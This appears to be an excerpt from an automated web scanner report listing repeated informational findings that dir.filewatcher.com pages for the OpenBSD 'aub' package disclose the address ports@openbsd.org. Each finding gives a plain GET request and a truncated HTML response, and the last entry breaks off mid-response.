GET /d/FreeBSD/distfiles/Other.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Mon, 24 Jan 2011 15:03:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 650
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 215
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
om@filewatcher.org and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

24.41. http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cKdin3ZdqrGl07/9m4nYyA"
Content-Length: 21147
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.42. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GJWxiO1o71UMYTNBAno0Ig"
Content-Length: 22842
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.43. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HN2mrHKKSLPiqeLdDv7xng"
Content-Length: 22236
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.44. http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:02 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QSjIlz4mHeQV6tMXgQ6s4Q"
Content-Length: 19360
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 186
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.45. http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "rXctGE9ZuJqH+Fb906+BLQ"
Content-Length: 19463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.46. http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "AyywHHTsGb4e3P/0PscWpw"
Content-Length: 22484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 175
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.47. http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+T32qb0lEneT8hwdZwNmWQ"
Content-Length: 23043
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.48. http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sRJNXt2YnEvJFMxJ8cr0wA"
Content-Length: 22283
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.49. http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8uwFEp9EFUfqNRxJeVtUQQ"
Content-Length: 22490
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 176
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.50. http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7VuYOQlGD9x2GFM1KZWiog"
Content-Length: 20401
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.51. http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wlm683WbAi037RAQWrT8VA"
Content-Length: 22662
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.52. http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IhWg+v1MTAtlwa1SgiETQw"
Content-Length: 22652
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.53. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "X9MgYBFw7AKSbPw/mZFSmA"
Content-Length: 20380
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.54. http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RJXDg++Gd640m7L2IsOVRA"
Content-Length: 22403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.55. http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GmLk8R3/tGBN7dqZ5++dSA"
Content-Length: 22328
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 156
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.56. http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JkFpCgLlVGqsLda3JsK6lQ"
Content-Length: 22721
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 168
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.57. http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WggwIsm1hyihQhmXNRbroQ"
Content-Length: 22445
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
<a href="mailto:ports@openbsd.org">ports@openbsd.org</a>
...[SNIP]...

24.58. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

Issue detail

The following email address was disclosed in the response:

ports@openbsd.org

Request

GET /d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qnqcNGV6GTGvBfWiVN/i8A"
Content-Length: 22667
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 162
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
